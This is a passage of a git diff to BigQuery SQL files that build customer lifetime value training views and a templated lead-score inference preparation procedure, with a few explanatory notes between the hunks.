the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. 
- LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Extracts the latest number of checkouts in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Extracts the latest number of checkouts in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Extracts the latest number of checkouts in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Extracts the latest number of checkouts in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Extracts the latest number of checkouts in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day, - -- Extracts the latest projected lifetime value (PLTV) revenue for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(pltv_revenue_180_days ) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS pltv_revenue_180_days - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` - -- Filters for users with a PLTV revenue greater than zero. - WHERE pltv_revenue_180_days > 0.0 -); - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. 
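The training-preparation tables above all rely on the same deduplication idiom: `SELECT DISTINCT` combined with `LAST_VALUE(...) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC)`. Because the partition key and the ORDER BY column are the same, every row in a partition is a peer of every other row, so the window returns a single shared value per user and feature date and `DISTINCT` collapses the duplicates. A minimal standalone sketch of that pattern, using a hypothetical `demo_features` inline table:

```sql
-- Minimal sketch of the LAST_VALUE + DISTINCT dedup idiom; `demo_features` is hypothetical.
WITH demo_features AS (
  SELECT 'userA' AS user_pseudo_id, DATE '2024-01-01' AS feature_date, 'mobile' AS device_category UNION ALL
  SELECT 'userA', DATE '2024-01-01', 'desktop' UNION ALL
  SELECT 'userB', DATE '2024-01-01', 'tablet'
)
SELECT DISTINCT
  user_pseudo_id,
  feature_date,
  -- All rows in a partition share the same ORDER BY value, so they are peers and the
  -- default RANGE frame spans the whole partition: every row gets the same picked value.
  LAST_VALUE(device_category)
    OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category
FROM demo_features;
-- Returns one row per (user_pseudo_id, feature_date); which of userA's tied values is kept
-- is not deterministic.
```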
-CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_30", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - -- Now, I want to skip rows per user, per split every 30 days. 
- ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days, - -- Row number for each user pseudo id, feature date and data split combination ordered by feature date descending. 
- ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_30` -) -WHERE - -- Filter 1 example ordered descending - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows each 30 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 30) = 0; - - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 90 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_90` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_90", - description="View Purchase Propensity Training dataset using 15 days back to predict 7 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - -- Now, I want to skip rows per user, per split every 15 days. 
- ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days, - -- Number of rows per user, per day, per split. Only one row per user, per day, per split. 
- ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_90` -) -WHERE - -- Filter 1 example ordered descending - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows of 90 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 90) = 0; - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 180 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_180` -(processed_timestamp, +-- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30` +(processed_timestamp, data_split, user_pseudo_id, user_id, @@ -1292,23 +621,23 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_tra checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days) + pltv_revenue_30_days) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_180", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", + friendly_name="v_customer_lifetime_value_training_180_30", + description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] -) AS +) AS SELECT DISTINCT * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( +FROM ( SELECT DISTINCT processed_timestamp, data_split, feature_date, user_pseudo_id, user_id, - -- Now, I want to skip rows per user, per split every 15 days. + -- Now, I want to skip rows per user, per split every 30 days. ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, device_category, device_mobile_brand_name, @@ -1364,7 +693,7 @@ SELECT DISTINCT checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days + pltv_revenue_30_days FROM( SELECT DISTINCT processed_timestamp, @@ -1426,20 +755,19 @@ SELECT DISTINCT checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + pltv_revenue_30_days, + -- Row number for each user pseudo id, feature date and data split combination ordered by feature date descending. ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_180` + FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_30` ) WHERE -- Filter 1 example ordered descending row_order_peruser_perday_persplit = 1 ) WHERE - -- Skipping windows of 30 days, which is the future window size. + -- Skipping windows each 30 days, which is the future window size. MOD(row_order_peruser_persplit-1, 30) = 0; - -- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. -- Consider only the last windows per user. 
So that we can use only the most recent interactions of users. CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30_last_window` @@ -1638,165 +966,3 @@ SELECT DISTINCT WHERE -- Filter 1 example ordered descending user_row_order = 1; - --- Creates the final view containing balanced input data for the CLTV model looking back 180 days to predict 30 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30_balanced` -(data_split, - user_pseudo_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_30_balanced", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS --- This query performs a stratified random sampling of users from the v_customer_lifetime_value_training_180_30 table, --- ensuring that the final dataset has a balanced representation of users across different PLTV revenue ranges. --- This balanced dataset is then used for training and validating a CLTV model. 
-SELECT DISTINCT - data_split, - user_pseudo_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days -FROM -( -SELECT -* EXCEPT(rn) FROM ( -SELECT - *, - -- Calculates a unique row number (rn) for each row within each bucket. - -- The PARTITION BY bucket ensures that the numbering is independent for each bucket. - -- The ORDER BY RAND() randomizes the order of rows within each bucket. - ROW_NUMBER() OVER (PARTITION BY bucket ORDER BY RAND()) AS rn -FROM ( - SELECT - *, - -- Creates a new column called bucket by categorizing users into 10 buckets based on - -- their pltv_revenue_30_days (predicted lifetime value revenue over the next 30 days). - CASE - WHEN pltv_revenue_30_days < 50 THEN "bucket1" - WHEN pltv_revenue_30_days BETWEEN 50 AND 100 THEN "bucket2" - WHEN pltv_revenue_30_days BETWEEN 100 AND 200 THEN "bucket3" - WHEN pltv_revenue_30_days BETWEEN 200 AND 300 THEN "bucket4" - WHEN pltv_revenue_30_days BETWEEN 300 AND 400 THEN "bucket5" - WHEN pltv_revenue_30_days BETWEEN 400 AND 500 THEN "bucket6" - WHEN pltv_revenue_30_days BETWEEN 500 AND 750 THEN "bucket7" - WHEN pltv_revenue_30_days BETWEEN 750 AND 1000 THEN "bucket8" - WHEN pltv_revenue_30_days BETWEEN 1000 AND 2000 THEN "bucket9" - WHEN pltv_revenue_30_days > 2000 THEN "bucket10" END as bucket - FROM - `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30`) -) -WHERE - -- This filter selects only the first 1000 rows from each bucket. - -- This is a form of stratified sampling, ensuring that the final dataset has a - -- balanced representation of users across different PLTV revenue ranges - rn <= 1000) -; diff --git a/sql/procedure/lead_score_propensity_inference_preparation.sqlx b/sql/procedure/lead_score_propensity_inference_preparation.sqlx new file mode 100644 index 00000000..d9753b88 --- /dev/null +++ b/sql/procedure/lead_score_propensity_inference_preparation.sqlx @@ -0,0 +1,352 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. 
+-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +DECLARE lastest_processed_time_ud TIMESTAMP; +DECLARE lastest_processed_time_useam TIMESTAMP; +DECLARE lastest_processed_time_uwlm TIMESTAMP; +DECLARE lastest_processed_time_um TIMESTAMP; + +-- Setting procedure to lookback from the day before `inference_date` +SET inference_date = DATE_SUB(inference_date, INTERVAL 1 DAY); + +SET lastest_processed_time_ud = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_useam = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_session_event_aggregated_metrics` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_uwlm = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_um = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_scoped_metrics` WHERE feature_date = inference_date LIMIT 1); + +CREATE OR REPLACE TEMP TABLE inference_preparation_ud as ( + SELECT DISTINCT + -- The user pseudo id + UD.user_pseudo_id, + -- The user id + MAX(UD.user_id) OVER(user_dimensions_window) AS user_id, + -- The feature date + UD.feature_date, + -- The user lifetime value revenue + MAX(UD.user_ltv_revenue) OVER(user_dimensions_window) AS user_ltv_revenue, + -- The device category + MAX(UD.device_category) OVER(user_dimensions_window) AS device_category, + -- The device brand name + MAX(UD.device_mobile_brand_name) OVER(user_dimensions_window) AS device_mobile_brand_name, + -- The device model name + MAX(UD.device_mobile_model_name) OVER(user_dimensions_window) AS device_mobile_model_name, + -- The device operating system + MAX(UD.device_os) OVER(user_dimensions_window) AS device_os, + -- The device language + MAX(UD.device_language) OVER(user_dimensions_window) AS device_language, + -- The device web browser + MAX(UD.device_web_browser) OVER(user_dimensions_window) AS device_web_browser, + -- The user sub continent + MAX(UD.geo_sub_continent) OVER(user_dimensions_window) AS geo_sub_continent, + -- The user country + MAX(UD.geo_country) OVER(user_dimensions_window) AS geo_country, + -- The user region + MAX(UD.geo_region) OVER(user_dimensions_window) AS geo_region, + -- The user city + MAX(UD.geo_city) OVER(user_dimensions_window) AS geo_city, + -- The user metro + MAX(UD.geo_metro) OVER(user_dimensions_window) AS geo_metro, + -- The user last traffic source medium + MAX(UD.last_traffic_source_medium) OVER(user_dimensions_window) AS last_traffic_source_medium, + -- The user last traffic source name + MAX(UD.last_traffic_source_name) OVER(user_dimensions_window) AS last_traffic_source_name, + -- The user last traffic source source + MAX(UD.last_traffic_source_source) OVER(user_dimensions_window) AS last_traffic_source_source, + -- The user first traffic source medium + MAX(UD.first_traffic_source_medium) OVER(user_dimensions_window) AS 
first_traffic_source_medium, + -- The user first traffic source name + MAX(UD.first_traffic_source_name) OVER(user_dimensions_window) AS first_traffic_source_name, + -- The user first traffic source source + MAX(UD.first_traffic_source_source) OVER(user_dimensions_window) AS first_traffic_source_source, + -- Whether the user has signed in with user ID + MAX(UD.has_signed_in_with_user_id) OVER(user_dimensions_window) AS has_signed_in_with_user_id, +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` UD +INNER JOIN + `{{project_id}}.{{mds_dataset}}.latest_event_per_user_last_72_hours` LEU +ON + UD.user_pseudo_id = LEU.user_pseudo_id +WHERE + -- In the future consider `feature_date BETWEEN start_date AND end_date`, to process multiple days. Modify Partition BY + UD.feature_date = inference_date + AND UD.processed_timestamp = lastest_processed_time_ud +WINDOW + user_dimensions_window AS (PARTITION BY UD.user_pseudo_id ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + + +CREATE OR REPLACE TEMP TABLE inference_preparation_uwlm as ( + SELECT DISTINCT + -- User pseudo id + UWLM.user_pseudo_id, + -- Feature date + UWLM.feature_date{% for feature in short_list_features %}, + -- Calculate the maximum value for each metric over the window + MAX(UWLM.{{feature.feature_name}}_past_1_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_1_day, + MAX(UWLM.{{feature.feature_name}}_past_2_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_2_day, + MAX(UWLM.{{feature.feature_name}}_past_3_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_3_day, + MAX(UWLM.{{feature.feature_name}}_past_4_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_4_day, + MAX(UWLM.{{feature.feature_name}}_past_5_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_5_day{% endfor %} +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` UWLM +INNER JOIN + `{{project_id}}.{{mds_dataset}}.latest_event_per_user_last_72_hours` LEU +ON + UWLM.user_pseudo_id = LEU.user_pseudo_id +WHERE + -- Filter for the features in the inference date + UWLM.feature_date = inference_date + AND UWLM.processed_timestamp = lastest_processed_time_uwlm +WINDOW + user_rolling_lead_window AS (PARTITION BY UWLM.user_pseudo_id ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating all features over the date intervals.
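The `{% for feature in short_list_features %}` blocks above are Jinja loops that expand into one set of rolling-window columns per configured lead feature. As a rough illustration, with a single hypothetical feature named `scroll_50`, the rendered rolling-window selection would look like the sketch below (only the first two day-columns are shown, and a CTE stands in for the feature-store table so the snippet is self-contained):

```sql
-- Illustrative rendering only; `scroll_50` is a hypothetical feature name and the CTE
-- stands in for `user_rolling_window_lead_metrics`.
WITH user_rolling_window_lead_metrics AS (
  SELECT 'userA' AS user_pseudo_id, DATE '2024-01-01' AS feature_date,
         3 AS scroll_50_past_1_day, 1 AS scroll_50_past_2_day
)
SELECT DISTINCT
  UWLM.user_pseudo_id,
  UWLM.feature_date,
  -- One block like this is emitted per entry in short_list_features.
  MAX(UWLM.scroll_50_past_1_day) OVER(user_rolling_lead_window) AS scroll_50_past_1_day,
  MAX(UWLM.scroll_50_past_2_day) OVER(user_rolling_lead_window) AS scroll_50_past_2_day
FROM user_rolling_window_lead_metrics UWLM
WINDOW
  user_rolling_lead_window AS (PARTITION BY UWLM.user_pseudo_id ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING);
```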
